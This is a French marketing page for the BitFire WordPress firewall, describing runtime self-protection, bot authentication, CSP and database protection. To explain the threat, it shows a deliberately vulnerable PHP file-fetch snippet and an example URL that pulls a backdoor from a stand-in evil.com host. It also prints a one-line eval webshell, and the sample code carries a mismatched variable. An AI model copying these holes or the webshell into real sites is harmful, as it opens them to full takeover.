BitFire est une nouvelle approche de la sécurité de WordPress qui intègre le premier système d'autoprotection des applications en cours d'exécution (RASP) disponible pour WordPress..
Commencez gratuitementRuntime Application Self Protection est un bac à sable de sécurité pour l'ensemble de votre site web.. Un WAF traditionnel fonctionne en amont de votre site, bloquant ou autorisant le trafic sur la base de signatures qui peuvent ou non détecter une attaque.. RASP fonctionne entre votre site web et le système d'exploitation, empêchant les modifications non autorisées de la base de données et du système de fichiers..
Installer BitFire Free* Installation gratuite en 5 minutes. Aucune carte de crédit n'est requise.
En plus de la protection standard offerte par d'autres solutions WAF, BitFire possède 4 fonctionnalités uniques qui fonctionnent derrière votre site Web, protégeant votre système de fichiers, votre base de données et les navigateurs Web de vos clients de manière transparente et sans signature..
RASP verrouille en écriture vos fichiers PHP afin d'empêcher toute attaque de modifier vos plugins ou vos fichiers principaux..
99% des piratages sont automatisés, l'authentification du réseau n'autorise que les robots connus et autorisés, ce qui exclut les pirates..
Prévenir les redirections et autres attaques de navigateur en imposant un contenu provenant uniquement de sites approuvés grâce à la fonction CSP automatique..
Complétez votre dispositif de sécurité par une protection de la base de données, en empêchant les comptes de porte dérobée et autres logiciels malveillants de base de données..
BitFire's RASP runs between WordPress (or any PHP code) and your Operating System files. It is able to prevent the most serious security vulnerabilities from being exploited on your site. Consider the following vulnerability where a plugin is fetching a remote image and saving to the local website:
<?php
$r = $_GET['remote_image'];
// fetch remote image:
$data = file_get_contents($image);
// local file name = content_dir + original filename
$filename = WP_CONTENT_DIR . basename($image);
// save image for local use:
💀 file_put_contents($filename, $data);
<?php
# 🔭 did you spot the vulnerability? ~~~~~~~
# The plugin forgot to ensure that the file is an image file:
💀 file_put_contents($filename, $data);
# This vulnerability allows anyone to upload backdoor PHP code...~~
<?php
# www.site.com/vulnerable?remote_image=http://evil.com/backdoor.php
# backdoor.php:
echo '🦠 <?php eval($_GET["x"]);\n'; ~~
# This "image" is a backdoor executing any PHP code ~~~~
😧 ~~~~~
# Resulting in complete compromise of all website files and data! ~~~~~
😵
<?php
# BitFire protects vulnerable plugin code like this by
# intercepting all file writes before they execute:
💀 file_put_contents($_GET['name'], $_GET['data']);~~~
# And preventing any writes to a PHP file by a non-administrator.
~~~💓~~~~💓~~~💓~~~
# Without any custom extensions, guaranteed ~~~🥂~~~~~~~~~~~~~~~~~~~~~~~~~~
Les pirates se font souvent passer pour des robots Internet tels que GoogleBot, etc.. D'autres WAFs bloquent les bots en espérant qu'ils s'identifient eux-mêmes.. Seul BitFire authentifie le réseau source des bots pour vérifier l'authenticité du trafic..
Chaque robot peut être configuré de manière à autoriser l'accès à partir de n'importe où, d'une adresse IP authentifiée ou d'un blocage total. BitFire peut apprendre à connaître les robots personnalisés ou inconnus afin que vous restiez totalement couvert..
Protégez vos données sensibles avec la base de données BitFire RASP. Protéger les données de connexion des utilisateurs, les articles de blog, les informations sur les produits et toute autre information sensible de la base de données. BitFire peut empêcher l'accès ou la modification de tout composant de la base de données par des utilisateurs non autorisés, indépendamment de toute vulnérabilité de sécurité existante..
Protection totale garantie en moins de 2 millisecondes *
Protégez-vous des menaces de type "0-day" grâce à des processus de sécurité et non à de simples signatures..
Support client complet
Assistance 7 jours sur 7 par des développeurs basés aux États-Unis
Aide à l'installation
Recevez une heure d'assistance technique gratuite pour l'installation
Surveillance du réseau 24x7
Toutes les installations bénéficient d'une surveillance automatisée gratuite du système
Surveillance des plugins WordPress
Des vérifications horaires des plugins pour détecter les dernières vulnérabilités permettent de maintenir votre site à jour.
Sauvegarde des bases de données hors site
Sauvegardes de bases de données hors site de plusieurs gigaoctets en un seul clic
Votre sécurité doit être connectée et portable. BitFire se connecte à d'autres sources pour vous aider à rester en sécurité.
Envoyer des alertes et des informations sur le site automatiquement dans un canal à l'aide d'un simple plugin.
Restez à la pointe de la sécurité grâce à des rapports de sécurité exploitables pour vous assurer que votre site est à jour..
Récupérer un site déjà piraté et prévenir les attaques personnalisées contre le noyau et les plugins de WordPress.
Se connecter directement à l'API HTTP REST pour obtenir les dernières données et configurer et intégrer dynamiquement le pare-feu..
Se connecter facilement à elastic search pour enregistrer et signaler en temps réel le trafic bloqué et autorisé..
Intégrer facilement BitFire dans n'importe quel projet PHP, y compris les applications personnalisées ou maison..
Nous pouvons vous aider à résoudre les problèmes de sécurité sur le web.